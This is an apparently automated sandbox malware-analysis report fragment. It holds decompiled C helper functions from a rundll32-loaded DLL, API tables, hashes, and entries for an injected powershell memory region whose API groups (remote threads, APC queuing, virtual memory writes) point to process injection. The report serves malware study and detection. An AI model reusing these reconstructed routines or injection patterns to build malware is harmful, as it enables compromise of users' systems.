                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: CreateEvent$CloseHandlememset
                                      • String ID:
                                      • API String ID: 2812548120-0
                                      • Opcode ID: 030b9df0babda94885d27c3b22748c67622d76ddc0f1ad58221f3b616355b5d5
                                      • Instruction ID: 6e4d09c7412e5b11707a43d4798d91977f2b358c69d09fe46307300b0c78f38d
                                      • Opcode Fuzzy Hash: 030b9df0babda94885d27c3b22748c67622d76ddc0f1ad58221f3b616355b5d5
                                      • Instruction Fuzzy Hash: DCF05EF120530C7FD310BF27DCC4C37BBACEB962ACB11496EF14682501D676AC098A60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E04DE5976() {
                                      				void* _t1;
                                      				intOrPtr _t5;
                                      				void* _t6;
                                      				void* _t7;
                                      				void* _t11;
                                      
                                      				_t1 =  *0x4dea30c; // 0x2d4
                                      				if(_t1 == 0) {
                                      					L8:
                                      					return 0;
                                      				}
                                      				SetEvent(_t1);
                                      				_t11 = 0x7fffffff;
                                      				while(1) {
                                      					SleepEx(0x64, 1);
                                      					_t5 =  *0x4dea35c; // 0x0
                                      					if(_t5 == 0) {
                                      						break;
                                      					}
                                      					_t11 = _t11 - 0x64;
                                      					if(_t11 > 0) {
                                      						continue;
                                      					}
                                      					break;
                                      				}
                                      				_t6 =  *0x4dea30c; // 0x2d4
                                      				if(_t6 != 0) {
                                      					CloseHandle(_t6);
                                      				}
                                      				_t7 =  *0x4dea2d8; // 0x50b0000
                                      				if(_t7 != 0) {
                                      					HeapDestroy(_t7);
                                      				}
                                      				goto L8;
                                      			}

                                      APIs
                                      • SetEvent.KERNEL32(000002D4,00000001,04DE3DC4), ref: 04DE5981
                                      • SleepEx.KERNEL32(00000064,00000001), ref: 04DE5990
                                      • CloseHandle.KERNEL32(000002D4), ref: 04DE59B1
                                      • HeapDestroy.KERNEL32(050B0000), ref: 04DE59C1
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: CloseDestroyEventHandleHeapSleep
                                      • String ID:
                                      • API String ID: 4109453060-0
                                      • Opcode ID: 7033bc296a3f0d918ff069832b1634cb3ad7c6b1b139c7d76d6e0177fcbe5d3b
                                      • Instruction ID: f09ced64ce4295c1ff5967a8cde275475fda379b83b8699c0a781858fc10a788
                                      • Opcode Fuzzy Hash: 7033bc296a3f0d918ff069832b1634cb3ad7c6b1b139c7d76d6e0177fcbe5d3b
                                      • Instruction Fuzzy Hash: B5F09E75B02312A7DE10BBB7EC78AA63B98EB057B5B444154AD05DA385DB29EC408960
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 37%
                                      			E04DE3F7E() {
                                      				void* _v0;
                                      				void** _t3;
                                      				void** _t5;
                                      				void** _t7;
                                      				void** _t8;
                                      				void* _t10;
                                      
                                      				_t3 =  *0x4dea3cc; // 0x54a95b0
                                      				__imp__( &(_t3[0x10]));
                                      				while(1) {
                                      					_t5 =  *0x4dea3cc; // 0x54a95b0
                                      					_t1 =  &(_t5[0x16]); // 0x0
                                      					if( *_t1 == 0) {
                                      						break;
                                      					}
                                      					Sleep(0xa);
                                      				}
                                      				_t7 =  *0x4dea3cc; // 0x54a95b0
                                      				_t10 =  *_t7;
                                      				if(_t10 != 0 && _t10 != 0x4deb81a) {
                                      					HeapFree( *0x4dea2d8, 0, _t10);
                                      					_t7 =  *0x4dea3cc; // 0x54a95b0
                                      				}
                                      				 *_t7 = _v0;
                                      				_t8 =  &(_t7[0x10]);
                                      				__imp__(_t8);
                                      				return _t8;
                                      			}

                                      APIs
                                      • RtlEnterCriticalSection.NTDLL(054A9570), ref: 04DE3F87
                                      • Sleep.KERNEL32(0000000A), ref: 04DE3F91
                                      • HeapFree.KERNEL32(00000000), ref: 04DE3FBF
                                      • RtlLeaveCriticalSection.NTDLL(054A9570), ref: 04DE3FD4
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                      • String ID:
                                      • API String ID: 58946197-0
                                      • Opcode ID: 8218c0e4d659da4f4e527b29ef5ff4de8383e781de45938b1daf3aeedfb7b7f2
                                      • Instruction ID: 715aff88ce7fcee298be1c9dcb1b54099b70567a32e1ba78b568e2bb94910294
                                      • Opcode Fuzzy Hash: 8218c0e4d659da4f4e527b29ef5ff4de8383e781de45938b1daf3aeedfb7b7f2
                                      • Instruction Fuzzy Hash: 48F0D4B43412029FEB18FF97E8A9A353BB4EB44301B09504AE902DB390C638FC00DA24
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 58%
                                      			E04DE5296(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                      				intOrPtr* _v8;
                                      				void* _t17;
                                      				intOrPtr* _t22;
                                      				void* _t27;
                                      				char* _t30;
                                      				void* _t33;
                                      				void* _t34;
                                      				void* _t36;
                                      				void* _t37;
                                      				void* _t39;
                                      				int _t42;
                                      
                                      				_t17 = __eax;
                                      				_t37 = 0;
                                      				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                      				_t2 = _t17 + 1; // 0x1
                                      				_t28 = _t2;
                                      				_t34 = E04DE4DF6(_t2);
                                      				if(_t34 != 0) {
                                      					_t30 = E04DE4DF6(_t28);
                                      					if(_t30 == 0) {
                                      						E04DE4C73(_t34);
                                      					} else {
                                      						_t39 = _a4;
                                      						_t22 = E04DE79D7(_t39);
                                      						_v8 = _t22;
                                      						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                      							_a4 = _t39;
                                      						} else {
                                      							_t26 = _t22 + 2;
                                      							_a4 = _t22 + 2;
                                      							_t22 = E04DE79D7(_t26);
                                      							_v8 = _t22;
                                      						}
                                      						if(_t22 == 0) {
                                      							__imp__(_t34, _a4);
                                      							 *_t30 = 0x2f;
                                      							 *((char*)(_t30 + 1)) = 0;
                                      						} else {
                                      							_t42 = _t22 - _a4;
                                      							memcpy(_t34, _a4, _t42);
                                      							 *((char*)(_t34 + _t42)) = 0;
                                      							__imp__(_t30, _v8);
                                      						}
                                      						 *_a8 = _t34;
                                      						_t37 = 1;
                                      						 *_a12 = _t30;
                                      					}
                                      				}
                                      				return _t37;
                                      			}

                                      APIs
                                      • lstrlen.KERNEL32(00000000,00000008,?,77004D40,?,?,04DE4BF5,?,?,?,?,00000102,04DE5388,?,?,00000000), ref: 04DE52A2
                                        • Part of subcall function 04DE4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04DE5522), ref: 04DE4E02
                                        • Part of subcall function 04DE79D7: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04DE52D0,00000000,00000001,00000001,?,?,04DE4BF5,?,?,?,?,00000102), ref: 04DE79E5
                                        • Part of subcall function 04DE79D7: StrChrA.SHLWAPI(?,0000003F,?,?,04DE4BF5,?,?,?,?,00000102,04DE5388,?,?,00000000,00000000), ref: 04DE79EF
                                      • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04DE4BF5,?,?,?,?,00000102,04DE5388,?), ref: 04DE5300
                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 04DE5310
                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 04DE531C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                      • String ID:
                                      • API String ID: 3767559652-0
                                      • Opcode ID: 9bda6e6b66fde297b4c59000ae70eb18c55151474192af3df6a42d37fb2f5c2d
                                      • Instruction ID: e260b75bc71c1c102de94d885b8da0d536754962784470b39eb4aeb2f76cfea2
                                      • Opcode Fuzzy Hash: 9bda6e6b66fde297b4c59000ae70eb18c55151474192af3df6a42d37fb2f5c2d
                                      • Instruction Fuzzy Hash: 5321D272600259BBCF127FBAD864ABE7FB9EF16298B444051F9059F211E774E901C7B0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E04DE6203(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                      				void* _v8;
                                      				void* _t18;
                                      				int _t25;
                                      				int _t29;
                                      				int _t34;
                                      
                                      				_t29 = lstrlenW(_a4);
                                      				_t25 = lstrlenW(_a8);
                                      				_t18 = E04DE4DF6(_t25 + _t29 + _t25 + _t29 + 2);
                                      				_v8 = _t18;
                                      				if(_t18 != 0) {
                                      					_t34 = _t29 + _t29;
                                      					memcpy(_t18, _a4, _t34);
                                      					_t10 = _t25 + 2; // 0x2
                                      					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                      				}
                                      				return _v8;
                                      			}

                                      APIs
                                      • lstrlenW.KERNEL32(004F0053,?,77005520,00000008,054A93CC,?,04DE6861,004F0053,054A93CC,?,?,?,?,?,?,04DE6BB4), ref: 04DE6213
                                      • lstrlenW.KERNEL32(04DE6861,?,04DE6861,004F0053,054A93CC,?,?,?,?,?,?,04DE6BB4), ref: 04DE621A
                                        • Part of subcall function 04DE4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04DE5522), ref: 04DE4E02
                                      • memcpy.NTDLL(00000000,004F0053,770069A0,?,?,04DE6861,004F0053,054A93CC,?,?,?,?,?,?,04DE6BB4), ref: 04DE623A
                                      • memcpy.NTDLL(770069A0,04DE6861,00000002,00000000,004F0053,770069A0,?,?,04DE6861,004F0053,054A93CC), ref: 04DE624D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: lstrlenmemcpy$AllocateHeap
                                      • String ID:
                                      • API String ID: 2411391700-0
                                      • Opcode ID: c347ba94257a18e6fcf7944e7471ab75b536840df9a7d26889698b93ea5fecbd
                                      • Instruction ID: 30c363123045cec53e55db6571afb39ec80b9fdbba4fc0f1c9bd1e87aaefd5b7
                                      • Opcode Fuzzy Hash: c347ba94257a18e6fcf7944e7471ab75b536840df9a7d26889698b93ea5fecbd
                                      • Instruction Fuzzy Hash: D8F0F976A00119BB9F11EFAACC89CDF7BACEF493587554062FD04D7202E635EA149BA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • lstrlen.KERNEL32(054A9B90,00000000,00000000,76D8C740,04DE6568,00000000), ref: 04DE3980
                                      • lstrlen.KERNEL32(?), ref: 04DE3988
                                        • Part of subcall function 04DE4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04DE5522), ref: 04DE4E02
                                      • lstrcpy.KERNEL32(00000000,054A9B90), ref: 04DE399C
                                      • lstrcat.KERNEL32(00000000,?), ref: 04DE39A7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                      • String ID:
                                      • API String ID: 74227042-0
                                      • Opcode ID: 100cf4bc3ccf0376213ceb34e2e900e846d10ee9df568ff7817ef07687460eb9
                                      • Instruction ID: 77ffdae3aeed064c1b8d668339d123a2a9830c601d9aa4ef2e1be0a117ab9a0a
                                      • Opcode Fuzzy Hash: 100cf4bc3ccf0376213ceb34e2e900e846d10ee9df568ff7817ef07687460eb9
                                      • Instruction Fuzzy Hash: F3E09BB3602521678711BBE69C58CABB7ACEF896617040456FA00D7300D7299C01C7B1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000013.00000003.453688904.000002B3E6870000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002B3E6870000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_3_2b3e6870000_mshta.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                      • Instruction ID: dfbd2dbc5f03ba530c6a9a479f73a46e5d13e5bc31164c3ba5cc008e9638deaa
                                      • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                      • Instruction Fuzzy Hash: F49004444DD41F55D41451D10C5D35C714077CC350FD444C14417D01C5D5CD73D75157
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002DC007F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_2dc007f0000_powershell.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: @
                                      • API String ID: 0-2766056989
                                      • Opcode ID: 361629354863c7adea9ee09ac62841a8150ea8ab892e9aecf13e9f2ffacfd1d1
                                      • Instruction ID: 1ca673cb41782d2873108274b1b00ed8f4f179486dfc503477eceb3bbe58fdbd
                                      • Opcode Fuzzy Hash: 361629354863c7adea9ee09ac62841a8150ea8ab892e9aecf13e9f2ffacfd1d1
                                      • Instruction Fuzzy Hash: 96227430218E1ACFEBA9EF1C98897A673E1FB58311F71462A954AC3291DF34DD41DB81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002DC007F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_2dc007f0000_powershell.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InformationQueryToken
                                      • String ID: 0
                                      • API String ID: 4239771691-4108050209
                                      • Opcode ID: 8f459d0809fb6108b636d5ca042d46abcd9692ce79b6343a060e938baadf2093
                                      • Instruction ID: ba4752f0959067ba3ec2afddf44dbc163dfb94611e53809d0324dd68aa96d917
                                      • Opcode Fuzzy Hash: 8f459d0809fb6108b636d5ca042d46abcd9692ce79b6343a060e938baadf2093
                                      • Instruction Fuzzy Hash: CE41FC30618B498FD764EF18D8C8B9AB7E5FBD8311F604A2EE48EC3151DB349945CB82
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002DC007F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_2dc007f0000_powershell.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInformationProcessRemoteThread
                                      • String ID:
                                      • API String ID: 3020566308-0
                                      • Opcode ID: de513496ae206af5e6081092b5dbc868a720f7c32ac060a41bcfb3c512b8c035
                                      • Instruction ID: 36b6baff6a4a9ed705cef0a9a0cdcbafc7363c86e328ca8ed83ac6f20e16ec49
                                      • Opcode Fuzzy Hash: de513496ae206af5e6081092b5dbc868a720f7c32ac060a41bcfb3c512b8c035
                                      • Instruction Fuzzy Hash: F951A57161CB16CBE768EF2CD84977A77E0EB99312F21452ED90AC3291EA24DC01DB81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002DC007F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_2dc007f0000_powershell.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Section$CreateView
                                      • String ID: 0
                                      • API String ID: 1585966358-4108050209
                                      • Opcode ID: 8b919d054a1b8379d396ee9ee7003490226db2f3546486956fc07ada3ef7e19a
                                      • Instruction ID: c116546b8e8b74e6a5d9c074626810eb4b2a314f4103a3ad4a43a93ecfff201f
                                      • Opcode Fuzzy Hash: 8b919d054a1b8379d396ee9ee7003490226db2f3546486956fc07ada3ef7e19a
                                      • Instruction Fuzzy Hash: C271907021CF098FEB54EF18D889BA5B7E5FB98311F21056ED94AC7262DB34D841CB81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002DC007F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_2dc007f0000_powershell.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Create$MutexQueueThreadUser
                                      • String ID:
                                      • API String ID: 1097034428-0
                                      • Opcode ID: 941571099aad18ea7affcf372cf637b6d2292183614781d015a78eef3a685228
                                      • Instruction ID: f41f47b829f193d8cec4b53db244a3ef747e6ba71c04212181cc395407064ff3
                                      • Opcode Fuzzy Hash: 941571099aad18ea7affcf372cf637b6d2292183614781d015a78eef3a685228
                                      • Instruction Fuzzy Hash: A372B471618A08CFE798EF18EC896A533E1F754711F21862FD48BC31A2DE38D946DB81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002DC007F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_2dc007f0000_powershell.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateHeap
                                      • String ID:
                                      • API String ID: 10892065-0
                                      • Opcode ID: 42b612c78fe9b70062130d364ca0d4e6e8c0bf91701461e5dfe428bbca03cae4
                                      • Instruction ID: 3be7300b04faebb67deb16eb8384b9f15475fa4bc3cc5feaaf4330994d0254f8
                                      • Opcode Fuzzy Hash: 42b612c78fe9b70062130d364ca0d4e6e8c0bf91701461e5dfe428bbca03cae4
                                      • Instruction Fuzzy Hash: E9919430618B0A8FFBA4EB68D88976637E5FB94311F21432AE446C31A1EF74DD42D741
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002DC007F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_2dc007f0000_powershell.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InformationProcessQuery
                                      • String ID:
                                      • API String ID: 1778838933-0
                                      • Opcode ID: 2cbd10eb540a1377c62dc1952105ae5ca313dfe62637f8386d5eb1acd45784ee
                                      • Instruction ID: be1c6786b8653b781d3da8d52df3d3e7213b71b8eeb0accc537c9ad08601b1f2
                                      • Opcode Fuzzy Hash: 2cbd10eb540a1377c62dc1952105ae5ca313dfe62637f8386d5eb1acd45784ee
                                      • Instruction Fuzzy Hash: 32014430218D0E8FE794DF68E4C8A7573E6FFA8715F61066EA409C3159DB74D841C705
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002DC007F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_2dc007f0000_powershell.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: SectionView
                                      • String ID:
                                      • API String ID: 1323581903-0
                                      • Opcode ID: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
                                      • Instruction ID: 84f763039e873d8ea0f6af8e53bbf45a74b7ab7bca5f70d7eddc0c04c64438f7
                                      • Opcode Fuzzy Hash: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
                                      • Instruction Fuzzy Hash: 9C01D670A08B048FCB48DF69D4C8569BBE1FB58311F20066FE949C7796DB70D885CB45
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002DC007F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_2dc007f0000_powershell.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: MemoryVirtualWrite
                                      • String ID:
                                      • API String ID: 3527976591-0
                                      • Opcode ID: d8c855afc7970eb24a71728fbfc2e8406778788fce13a2eb5631248942bfb38d
                                      • Instruction ID: 66450d23bf179c56af9b9e01201aa7a3238d535ce7d362d05ddf5dc53a2659b6
                                      • Opcode Fuzzy Hash: d8c855afc7970eb24a71728fbfc2e8406778788fce13a2eb5631248942bfb38d
                                      • Instruction Fuzzy Hash: 63E06D70710A428BFB146FB9988C23873D0F748312F31082AE845C72A1EA2D8842DA41
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002DC007F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_2dc007f0000_powershell.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CreatePointerRead
                                      • String ID:
                                      • API String ID: 2103328899-0
                                      • Opcode ID: 876d94c119db6849c9370046cb500efc55646bd6fdd98435b9b0f08470bcb9d3
                                      • Instruction ID: fb23243592a3eb1a3826393923401b4a821ae0fd06418b07c5e6d9ba2c5ebb1d
                                      • Opcode Fuzzy Hash: 876d94c119db6849c9370046cb500efc55646bd6fdd98435b9b0f08470bcb9d3
                                      • Instruction Fuzzy Hash: 7C418430218A198FE798DF28D88873977E1F794315F35466ED05AC31A1DE79D843DB42
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002DC007F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_2dc007f0000_powershell.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BoundaryDeleteDescriptor
                                      • String ID:
                                      • API String ID: 3203483114-3916222277
                                      • Opcode ID: 288f9c1cbce8911936c130478318fe4cf2356879a3dc1ca2d5e6530766e1ddb2
                                      • Instruction ID: 6c87d597f50189ecbb6da6a5f7bc4e70983dc45449c6e1d3d2d201544c57b9a2
                                      • Opcode Fuzzy Hash: 288f9c1cbce8911936c130478318fe4cf2356879a3dc1ca2d5e6530766e1ddb2
                                      • Instruction Fuzzy Hash: CF513F71618A458BE728AF1C9C8D2B973D5FB89721F75033ED9CAC3292D9245D42C782
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002DC007F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_2dc007f0000_powershell.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Thread$ResumeSuspend
                                      • String ID:
                                      • API String ID: 3472746266-0
                                      • Opcode ID: 341209e84b548f9049f8f83d80656181302a846ef09d3cd64fff549bb4252ca5
                                      • Instruction ID: c7470e8dbcafaef9e73c1553036b10dd36f8d993605db5816258fff4a9862d6c
                                      • Opcode Fuzzy Hash: 341209e84b548f9049f8f83d80656181302a846ef09d3cd64fff549bb4252ca5
                                      • Instruction Fuzzy Hash: E261B830708B098BE798DB18D4497AA73D5FB89722F21562EE58BC3282DF34DD42C746
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002DC007F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_2dc007f0000_powershell.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateQueueThreadUser
                                      • String ID:
                                      • API String ID: 3600083758-0
                                      • Opcode ID: f9d1119d2a6f7ede32f3f151a7b292346c93d34cb54adac41a0938bd19bbd9d1
                                      • Instruction ID: 744f197407f86141db0c87a2d7097569444c592f8ddca56619a9ee7a4be4f574
                                      • Opcode Fuzzy Hash: f9d1119d2a6f7ede32f3f151a7b292346c93d34cb54adac41a0938bd19bbd9d1
                                      • Instruction Fuzzy Hash: DE017530718A098FEB84EF6C984D76977E2EBA8711B25826AE409C32B0DF34DC51C781
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002DC007F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_2dc007f0000_powershell.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ContinueHandlerVectored
                                      • String ID:
                                      • API String ID: 3758255415-0
                                      • Opcode ID: 7244c2c071395b83f47e7f4185413d39c7c9846b9b288bc70064fa91beeae027
                                      • Instruction ID: c32eafd2e86e7f0cc96e380a21902686c415bea8687edbaa321183bdc3e89d4f
                                      • Opcode Fuzzy Hash: 7244c2c071395b83f47e7f4185413d39c7c9846b9b288bc70064fa91beeae027
                                      • Instruction Fuzzy Hash: D651C331608A0A8FF794EF3898587EA77D2FB98316F25432A9046C21A2DF38C851DB41
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002DC007F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_2dc007f0000_powershell.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: aea9cbd2d73816048cc4defc325b6d5fd571de504d5c21790c552a3858797b3b
